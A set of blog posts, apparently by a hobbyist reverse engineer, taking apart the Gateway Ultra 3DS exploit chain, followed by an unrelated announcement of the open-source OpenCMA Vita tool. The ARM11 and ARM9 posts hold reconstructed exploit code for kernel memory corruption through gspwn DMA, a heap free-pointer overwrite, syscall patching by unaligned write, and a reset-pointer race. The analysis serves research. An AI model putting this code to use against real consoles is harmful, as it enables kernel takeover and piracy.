Reversing Gateway Ultra Stage 3: Owning ARM9 Kernel

First, some background: the 3DS has two main processors. Last time, I went over how Gateway Ultra exploited the ARM11 processor. However, most of the interesting (from a security perspective) functionalities are handled by a separate ARM946 processor. The ARM9 processor is in charge of the initial system bootup, some system services, and most importantly all the cryptographic functions such as encryption/decryption and signature/verification. In this post, we will look at how to run (privileged) code on the ARM9 processor with privileged access to the ARM11 processor. Please note that this writeup is a work in progress as I have not completely figured out how the exploit works (only the main parts of it). Specifically there are a couple of things that I do not know if it is done for the sake of the exploit or if it is done purely for stability or obfuscation. From a developer’s perspective, it doesn’t matter because as long as you perform all the steps, you will achieve code execution. But from a hacker’s perspective, the information is not complete unless all aspects are known and understood. I am posting this now as-is because I do not know when I’ll have time to work on the 3DS again. However, when I do, I will update the post and hopefully clear up all confusion.

Code

For simplicity in description, from this point on, I will use pointers and offset values specific to the 4.x kernel. However, the code is the same for all firmware versions.

void arm11_kernel_entry(void) // pointers specific to 4.x
{
  int (*sub_FFF748C4)(int, int, int, int) = 0xFFF748C4;

  __clrex(); // release any exclusive access
  memcpy(0xF3FFFF00, 0x08F01010, 0x1C);// copy GW specific data
  invalidate_dcache();
  invalidate_icache();
  clear_framebuffer(); // clear screen and saves some GPU registers
  // ARM9 code copied to FCRAM 0x23F00000
  memcpy(0xF3F00000, ARM9_PAYLOAD, ARM9_PAYLOAD_LEN);
  // write function hook at 0xFFFF0C80
  memcpy(0xEFFF4C80, jump_table, FUNC_LEN);
  // write FW specific offsets to copied code buffer
  *(int *)(0xEFFF4C80 + 0x60) = 0xFFFD0000; // PDN regs
  *(int *)(0xEFFF4C80 + 0x64) = 0xFFFD2000; // PXI regs
  *(int *)(0xEFFF4C80 + 0x68) = 0xFFF84DDC; // where to return to from hook
  // patch function 0xFFF84D90 to jump to our hook
  *(int *)(0xFFF84DD4 + 0) = 0xE51FF004; // ldr pc, [pc, #-4]
  *(int *)(0xFFF84DD4 + 4) = 0xFFFF0C80; // jump_table + 0
  // patch reboot start function to jump to our hook
  *(int *)(0xFFFF097C + 0) = 0xE51FF004; // ldr pc, [pc, #-4]
  *(int *)(0xFFFF097C + 4) = 0x1FFF4C84; // jump_table + 4
  invalidate_dcache();
  sub_FFF748C4(0, 0, 2, 0); // trigger reboot
}

// not called directly, offset determines jump
void jump_table(void)
{
  func_patch_hook();
  reboot_func();
}

void func_patch_hook(void)
{
  // data written from entry
  int pdn_regs;
  int pxi_regs;
  int (*func_hook_return)(void);

  // save context
  __asm__ ("stmfd sp!, {r0-r12,lr}")
  // TODO: Why is this needed?
  pxi_send(pxi_regs, 0);
  pxi_sync(pxi_regs);
  pxi_send(pxi_regs, 0x10000);
  pxi_recv(pxi_regs);
  pxi_recv(pxi_regs);
  pxi_recv(pxi_regs);
  // TODO: What does this do?
  *(char *)(pdn_regs + 0x230) = 2;
  for (i = 0; i < 16; i += 2); // busy spin
  *(char *)(pdn_regs + 0x230) = 0;
  for (i = 0; i < 16; i += 2); // busy spin
  // restore context and run the two instructions that were replaced
  __asm__ ("ldmfd sp!, {r0-r12,lr}\t\n"
           "ldr r0, =0x44836\t\n"
           "str r0, [r1]\t\n"
           "ldr pc, %0", func_hook_return);
}

// this is a patched version of function 0xFFFF097C
// stuff found in the original code are skipped
void reboot_func(void)
{
  ... // setup
  // disable all interrupts
  __asm__ ("mrs r0, cpsr\t\n"
           "orr r0, r0, #0x1C0\t\n"
           "msr cpsr_cx, r0" ::: "r0");
  while ( *(char *)0x10140000 & 1 ); // wait for powerup ready
  *(void **)0x2400000C = 0x23F00000; // our ARM9 payload
  ...
}

Memory Configurations

A quick side-note on the way that ARM11 talks to ARM9. There is a FIFO with a register interface called the PXI and is used to pass data to and from each processor. Additionally, most of the physical memory mappings are shared between the two processors. Data stored, for example, in the FCRAM or AXI WRAM can be seen by both processors (provided proper cache coherency). However, there is one region (physical 0×08000000 to 0×081000000) that only the ARM9 processor can see. ARM9 code runs in this region. Another thing to note is that the ARM9 processor only performs a one-to-one virtual memory addressing (aka physical addresses and virtual addresses are the same) but I have been told that it does have memory protection enabled.

ARM9 Process

The ARM9 processor only (ever) has one process running, Process9, which speaks with the kernel to handle commands from ARM11. Process9 has access to a special syscall 0x7B, which takes in a function pointer and executes it in kernel mode. This means that essentially, owning ARM9 usermode is enough to get kernel code execution without any additional exploits.

Exploit Setup

After doing some housekeeping, the first thing the second stage payload code does is copy the third stage ARM9 code to a known location in FCRAM. Next, it makes patches to two ARM11 kernel functions. First, it patches the function at 0xFFF84D90 (I believe this function performs the kernel reboot) to jump into a function hook early-on. Second, it patches the function at 0xFFFF097C (I believe this function is ran after the ARM11 processor resets) to jump into another function hook. These two hooks are the key to how the exploit works.

Soft Rebooting

The 3DS supports soft rebooting (resetting the processor state without clearing the memory) in order to switch modes (ex: for DS games) and presumably to enable entering and exiting sleep mode. I believe this is triggered at the end of the the exploit setup by calling the function at 0xFFF748C4. At some point in this function, the subroutine at 0xFFF84D90 is called, which runs the code in our first function hook before continuing the execution.

At the same time in the ARM9 processor, Process9 now waits for a special command, 0×44836 from PXI, in the function at 0x0807B97C. I believe that the first function hook in ARM11 sends a series to commands to put Process9 into function 0x0807B97C, however that is only a guess.

The ARM11 processor continues to talk with ARM9 through the PXI and at some point both agree on a shared buffer in FCRAM at 0×24000000 (EDIT: yellows8 says this is the FIRM header) where some information is stored. At 0x2400000C is a function pointer to what ARM9 should execute after the reset. Process9 verifies that this function pointer is in the ARM9 private memory region 0×08000000-0×08100000 (EDIT: I assume the FIRM header signature check also takes place at this point). ARM11 resets and spinlocks in the function at 0xFFFF097C to wait for ARM9 to finish its tasks and tell ARM11 what to do.

Process9 at this point uses SVC 0x7B to jump into some reset handler at 0x080FF600 in kernel mode. At the end of that function, the ARM9 kernel reads the pointer value at 0x2400000C and jumps to it.

Reset ToCTToU

The problem here is simple. Process9 checks that the data at 0x2400000C (which is FCRAM, shared by both processors) is a valid pointer to code in ARM9 private memory (that ARM11 cannot access). However, after the check passes and before the function pointer is used, ARM11 can overwrite the value to point to code in FCRAM and ARM9 will execute it when it resets. This time-of-check-to-time-of-use bug is made possible by patching the ARM11 function that runs after reset so that it can wait for the right signal and then quickly overwrite the data in FCRAM before ARM9 uses it.

Conclusions

I apologize for the vagueness and likely mistakes in parts. I hope that if I don’t have the time to finish this analysis, someone else can pick up where I left off. Specifically, there are a couple of main questions that I haven’t answered:

  1. What is the function at 0xFFF748C4, what do the arguments do, and how does it call into function 0xFFF84D90? I speculate that it’s a function that performs the reset, but a more precise description is needed.
  2. What is the purpose of the first function hook? Specifically why does it send 0 and 0×10000 through PXI and what does PDN register 0×230 do?
  3. How does Process9 enter function 0x0807B97C? I suspect that it may have something to do with the first function hook in ARM11.

I hope that either someone can answer these questions (as well as correct any mistakes I’ve made) or that I’ll have time in the future to continue this analysis. This will also be the end of my journey to reverse Gateway Ultra (but the next release may spark my interest again). I don’t particularly care about the later stages (I hear there’s a modified MIPS VM and timing based obfuscation) or how Gateway enforces DRM to make sure only their card is used. If I do any more reversing with the 3DS, it would be on the kernel and applications so I can make patches of my own instead of worrying about how Gateway does it.

At this point, the information should be enough for anyone to take complete control of the 3DS (<= 9.2.0). I believe that information on its own is amoral but it takes people to make it immoral. There’s no point in arguing if piracy is right or wrong or if making this information public would help or harm pirates. I am not here to ensure the 3DS thrives. I am not here to take business away from Gateway. I am not here to be a moral police. I am only here to make sure that information is available for those who thirst for knowledge as much as I do in a form that is as precise and accurate as I can make it.

Reversing Gateway Ultra Stage 2: Owning ARM11 Kernel

It’s been a couple of days since my initial analysis of Gateway Ultra, released last week to enable piracy on 3DS. I spent most of this time catching up on the internals of the 3DS. I can’t thank the maintainers of 3dbrew enough (especially yellows8, the master of 3DS reversing) for the amount of detailed and technical knowledge found on the wiki. The first stage was a warmup and did not require any specific 3DS knowledge to reverse. The problem with the second stage is that while it is easy to see the exploit triggered and code to run, the actual exploit itself was not as clear. I looked at all the function calls made and made a couple of hypothesis of where the vulnerability resided, and reversed each function to the end to test my hypothesis. Although there was many dead ends and false leads, the process of reversing all these functions solidified my understanding of the system.

Code

As always, I like to post the reversed code first so those with more knowledge than me don’t have to read my verbose descriptions. I will explain the interesting parts afterwards. I am including the full code listing of the shellcode including parts that are irrelevant either because it is used as obfuscation, to provide stability, or as setup for later parts.

int memcpy(void *dst, const void *src, unsigned int len);
int GX_SetTextureCopy(void *input_buffer, void *output_buffer, unsigned int size, 
                      int in_x, int in_y, int out_x, int out_y, int flags);
int GSPGPU_FlushDataCache(void *addr, unsigned int len);
int svcSleepThread(unsigned long long nanoseconds);
int svcControlMemory(void **outaddr, unsigned int addr0, unsigned int addr1, 
                     unsigned int size, int operation, int permissions);

int
do_gspwn_copy (void *dst, unsigned int len, unsigned int check_val, int check_off)
{
    unsigned int result;

    do
    {
        memcpy (0x18401000, 0x18401000, 0x10000);
        GSPGPU_FlushDataCache (0x18402000, len);
        // src always 0x18402000
        GX_SetTextureCopy(0x18402000, dst, len, 0, 0, 0, 0, 8);
        GSPGPU_FlushDataCache (0x18401000, 16);
        GX_SetTextureCopy(dst, 0x18401000, 0x40, 0, 0, 0, 0, 8);
        memcpy(0x18401000, 0x18401000, 0x10000);
        result = *(unsigned int *)(0x18401000 + check_off);
    } while (result != check_val);

    return 0;
}

int
arm11_kernel_exploit_setup (void)
{
    unsigned int patch_addr;
    unsigned int *buffer;
    int i;
    int (*nop_func)(void);
    int *ipc_buf;
    int model;

    // part 1: corrupt kernel memory
    buffer = 0x18402000;
    // 0xFFFFFE0 is just stack memory for scratch space
    svcControlMemory(0xFFFFFE0, 0x18451000, 0, 0x1000, 1, 0); // free page
    patch_addr = *(int *)0x08F028A4;
    buffer[0] = 1;
    buffer[1] = patch_addr;
    buffer[2] = 0;
    buffer[3] = 0;
    // overwrite free pointer
    do_gspwn_copy(0x18451000, 0x10u, patch_addr, 4);
    // trigger write to kernel
    svcControlMemory(0xFFFFFE0, 0x18450000, 0, 0x1000, 1, 0);

    // part 2: obfuscation or trick to clear code cache
    for (i = 0; i < 0x1000; i++)
    {
        buffer[i] = 0xE1A00000; // ARM NOP instruction
    }
    buffer[i-1] = 0xE12FFF1E; // ARM BX LR instruction
    nop_func = *(unsigned int *)0x08F02894 - 0x10000; // 0x10000 below current code
    do_gspwn_copy(*(unsigned int *)0x08F028A0 - 0x10000, 0x10000, 0xE1A00000, 0);
    nop_func ();

    // part 3: get console model for future use (?)
    __asm__ ("mrc p15,0,%0,c13,c0,3\t\n"
             "add %0, %0, #128\t\n" : "=r" (ipc_buf));

    ipc_buf[0] = 0x50000;
    __asm__ ("mov r4, %0\t\n"
             "mov r0, %1\t\n"
             "ldr r0, [r0]\t\n"
             "svc 0x32\t\n" :: "r" (ipc_buf), "r" (0x3DAAF0) : "r0", "r4");

    if (ipc_buf[1])
    {
        model = ipc_buf[2] & 0xFF;
    }
    else
    {
        model = -1;
    }
    *(int *)0x8F01028 = model;

    return 0;
}

// after running setup, run this to execute func in ARM11 kernel mode
int __attribute__((naked))
arm11_kernel_exploit_exec (int (*func)(int, int, int), int arg1, int arg2)
{
    __asm__ ("mov r5, %0\t\n" // R5 = 0x3D1FFC, not used. likely obfusction.
             "svc 8\t\n" // CreateThread syscall, corrupted, args not needed
             "bx lr\t\n" :: "r" (0x3D1FFC) : "r5");
}

Vulnerability

The main vulnerability is actually still gspwn. Whereas in the first stage, it was used to overwrite (usually read-only) code from a CRO dynamic library to get userland code execution, it is now used to overwrite a heap free pointer so when the next memory page is freed, it would overwrite kernel memory.

3DS Memory Layout

To understand how the free pointer write corruption works, let’s first go over how the 3DS memory is laid out (in simple terms). You can get the full picture here, but I want to go over some key points. First, the “main” memory (used by applications and services) called the FCRAM is located at physical address 0×20000000 to 0×28000000. It is mapped in virtual memory in many places. First, the main application which is at around FCRAM 0x23xxxxxx (or higher if it is a system process or applet like the web browser) is mapped to 0×00100000 as read-only. Next we have some pages in the FCRAM 0x24xxxxxx region that can be mapped by the application on demand to virtual address 0x18xxxxxx through the syscall ControlMemory. Finally, the entire FCRAM is mapped in kernel 0xF0000000 – 0xF8000000 (this is for 4.1, different in other versions).

Another note about memory is that the ARM11 kernel is not located in the FCRAM, but in something called the AXI WRAM. The name is not important, but what is important is that it’s physical address 0x1FF80000 is mapped twice in kernel memory space. 0xFFF60000 is marked read-only executable and 0xEFF80000 is marked read-write non-executable. However, writing to 0xEFF80000 will allow you to execute the code at 0xFFF60000, which defeats the whole purpose of marking the pages non-executable. Since these mappings only apply in kernel mode, you would still need to perform a write to that address with kernel permissions.

ControlMemory Unchecked Write

The usual process for handling user controlled pointers in a syscall is to use the special ARM instructions LDRT and STRT, which performs the pointer dereference with user privileges in kernel mode. However, what if we overwrite a pointer that the developers did not think is user controlled? It would use the regular LDR/STR instructions and dereference with kernel privileges. The goal is achieved by the ControlMemory syscall along with gspwn. The ControlMemory syscall is used to allocate and free pages of memory from the heap region of the FCRAM. When it is called to free, like most heap allocators, certain pointers are stored in the newly freed memory block (to point to the next and previous free blocks). Like most heap allocators, it also performs “coalescing,” which means two free blocks will be combined to form a larger free block (and the pointers to and from it is updated accordantly).

The plan here is to free a block of memory, which places certain pointers in the freed block. This is usually safe since once the user frees the block, it is unmapped from the user virtual memory space and they cannot access the memory any more. However, we can with gspwn, so we overwrite the free pointer with gspwn to overwrite the code in the 0xEFF80000 region. And that is possible because the pointer dereference is done with kernel permissions because the pointers stored here is not normally user accessible.

The data stored in the freed region is as follows:

struct
{
    int some_count;
    struct free_data *next_free_block;
    struct free_data *prev_free_block;
    int unk_C;
    int unk_10;
} free_data;

When the first ControlMemory call happens in the exploit, it frees FCRAM 0×24451000 and writes the free_data structure to it. We then use gspwn to overwrite next_free_block to point to the kernel code we want to overwrite. Next we call ControlMemory to free the page immediately before (FCRAM 0×24450000). This will coalesce the block with

((struct free_data *)0x24450000)->next_free_block = ((struct free_data *)0x24451000)->next_free_block;
((struct free_data *)0x24451000)->next_free_block->prev_free_block = (struct free_data *)0x24450000;

As you can see, we control next_free_block of 0×24451000 and therefore control the write.

… But we’re not done yet. The above pseudocode was an artist rendition of what happens. Obviously, physical addresses are not used here. The user region virtual address (0x18xxxxxx) is not used either. The pointers here are the kernel virtual address 0xF4450000 and 0xF4451000. Since we can only write the value 0xF4450000 (or on 9.2, it is 0xE4450000), this poses a problem. Ideally, we want to write some ARM instruction that allows us to jump to code we control (BX R0 for example), however, 0xF4450000 assembles to “vst4.8{d16-d19}, [r5], r0″ (don’t worry, I don’t know what that is either) and 0xE4450000 assembles to “strb r0, [r5], #-0″. Both of which can’t be used (obviously) to control code execution. Now of course, we can try another address and see if we get lucky and the address happens to compile to a branch instruction, but we are not lucky. None of the user mappable/unmappable regions would give us a branch.

Unaligned Code Corruption

Here is the clever idea. What if we stop thinking of the problem as: how do I write an instruction that gives us execution control? but instead as: how do I corrupt the code to control it? I don’t usually like to post assembly listings, but it is impossible to dodge ARM assembly if you made it this far.

A note to systems programmers: There is a feature of ARMv6 that the 3DS enabled called unaligned read/write. This means a pointer does NOT have to be word aligned. In other words, you are allowed to write 4 bytes arbitrary to any address including something like “0×1003″. Now if you’re not a systems designer and don’t know about the problem of unaligned reads/writes (C nicely hides this from you), don’t worry, it just means everything works as you expect it to.

Let’s take a look at an arbitrary syscall, CreateThread. The actual syscall doesn’t matter, we only care about the assembly code that it runs:

   0:	e52de004 	push	{lr}		; (str lr, [sp, #-4]!)
   4:	e24dd00c 	sub	sp, sp, #12
   8:	e58d4004 	str	r4, [sp, #4]
   c:	e58d0000 	str	r0, [sp]
  10:	e28d0008 	add	r0, sp, #8
  14:	eb001051 	bl	0x4160
  18:	e59d1008 	ldr	r1, [sp, #8]
  1c:	e28dd00c 	add	sp, sp, #12
  20:	e49df004 	pop	{pc}		; (ldr pc, [sp], #4)

How do we patch this to control code flow? What if we get rid of the “add” on line 0x1c? Then we have on line 0xc, *SP = R0 and on line 0×20, PC = *SP, and since we trivially control R0 in a syscall, we can pass in a function pointer and run it.

Now if we replace the code at 0×18 with either 0xF4450000 or 0xE4450000, another problem arises. Both of those instructions (and there may be others from other firmware versions) try to dereference R5, which we don’t control. However, what if we write 0xF4450000/0xE4450000 starting at 0x1B? It would now corrupt two instructions instead of just one, but both are “safe” instructions.

...
  14:	eb001051 	bl	0x4160
  18:	009d1008 	addseq	r1, sp, r8
  1c:	e2e44500 	rsc	r4, r4, #0, 10
...

The actual code that is there isn’t particularly useful/important, which is exactly what we want. We successfully patched the kernel to jump to our code with a single syscall. Now making SVC 8 with R0 pointing to some function would run it in ARM11 kernel mode.

Closing

Although some may call this exploit overly simple, I thought the way it was exploited was very novel. It involved overwriting pointers that are meant to be inaccessible to users, then a type confusion of pointer to ARM code, and finally abusing unaligned writes to corrupt instructions in a safe way. Next time, I hope to conclude this series by reversing the ARM9 kernel exploit (for those unfamiliar, the 3DS has two kernels, one for applications and one for security, ARM9 is the interesting one). I want to thank, again, sbJFn5r for providing me with various dumps.

libVitaMTP & OpenCMA: Vita content management on Linux (and more)

More than a year ago, I’ve analyzed how the Vita communicates with the computer. I mentioned at the end that I started a project that will be an open source implementation of the protocol that the Vita uses. This protocol is just MTP (media transfer protocol) with some additional commands that I had to figure out. MTP is used by most Windows supported media players and cameras, so I was able to use a lot of existing code from libmtp and gphoto2. After lots of on and off work, I am happy to announce the first (beta) version of libVitaMTP and OpenCMA.

What is libVitaMTP and OpenCMA?

In anticipation of allowing developers to include Vita support in their media management applications, and for allowing developers to create custom applications that use the Vita (for example, it would be possible to write an application that uses the Vita as a general purpose storage device), I’ve placed all the backend code into libVitaMTP. This includes connecting of the Vita through libusb-1.0, processing various XML data sent from the device with libxml2, and supports an interface that allows the developer to send the various custom MTP commands to the device.

OpenCMA is the first user-level software that uses libVitaMTP. It serves two purposes. First, it’s a stripped down, open source implementation of CMA, that allows the user to send and receive games, backups, and media to and from the Vita. It is stripped down because Sony’s official CMA supports reading the metadata from media files, and I chose not to include this feature because it would complicate things.

More information can be found on the Github page.

Testing

If you are a developer and wish to include libVitaMTP in your projects, please give feedback on any bugs or difficulties/bad documentation/inconsistant documentation.

If you are a user and wish to test OpenCMA, I’ve provided some Debian packages (created and tested on Ubuntu 12.04) for you to try. After installing, just invoke “opencma -h” in the terminal to see how to use it.

A sample run of OpenCMA could be

$ opencma -u /path/to/dir/containing/updatelist -p /path/to/photos -v /path/to/videos -m /path/to/music -a /path/to/apps -l 4

the -l 4 means to show more logging information. This is very important for filing bug reports. If you encounter a crash or bug, please make sure to include the output of the OpenCMA session with -l 4. Note that more logging means slower transfers.

Please be careful not to pass in large directories because OpenCMA tries to create an index of all files (recursively) for each path.

Please submit all bug reports and feature requests to the Github issues page. It would make things easier if you include the -l 4 output.

Downloads

As always, the most up to date packages will be uploaded to the project page.